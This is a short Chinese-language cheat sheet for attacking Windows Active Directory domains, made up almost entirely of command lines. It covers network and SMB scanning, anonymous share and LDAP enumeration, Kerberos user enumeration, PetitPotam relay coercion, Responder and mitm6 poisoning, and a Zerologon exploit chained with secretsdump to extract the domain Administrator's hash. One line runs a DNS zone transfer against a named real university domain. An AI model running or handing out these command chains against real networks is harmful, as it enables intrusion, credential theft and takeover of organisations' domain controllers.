域渗透指南思维导图

cme smb <ip_range> # SMB 扫描存活主机

nmap -sP -p <ip> # ping 扫描

nmap -PN -sV --top-ports 50 --open <ip> # 快速扫描

nmap -PN --script smb-vuln* -p139,445 <ip> # 检测 SMB 漏洞

nmap -PN -sC -sV <ip> # 经典扫描

nmap -PN -sC -sV -p- <ip> # 全扫描

nmap -sU -sC -sV <ip> # UDP 扫描

nmcli dev show eth0 # 查看域和DNS

nslookup -type=SRV _ldap._tcp.dc._msdcs.//DOMAIN/

dig axfr @dns1.thnu.edu.cn thnu.edu.cn

enum4linux -a -u "" -p "" <dc-ip> && enum4linux -a -u "guest" -p "" <dc-ip>

smbmap -u "" -p "" -P 445 -H <dc-ip> && smbmap -u "guest" -p "" -P 445 -H <dc-ip>

smbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip>

cme smb <ip> -u '' -p '' # 枚举可空Session访问的SMB共享

cme smb <ip> -u 'a' -p '' #枚举可匿名访问的SMB共享

nmap -n -sV --script "ldap* and not brute" -p 389 <dc-ip>

ldapsearch -x -h <ip> -s base

enum4linux -U <dc-ip> | grep 'user:'

crackmapexec smb <ip> -u <user> -p '<password>' --users

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>

OSINT - 在互联网上寻找用户名

扫描没开启SMB签名的机器

PetitPotam.py -d <domain> <listener_ip> <target_ip>

responder -i eth0

mitm6 -d <domain>

python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip> secretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>\$@<IP> -no-pass -just-dc-user "Administrator" secretsdump.py -hashes :<HASH_admin> <DOMAIN>/Administrator@<IP>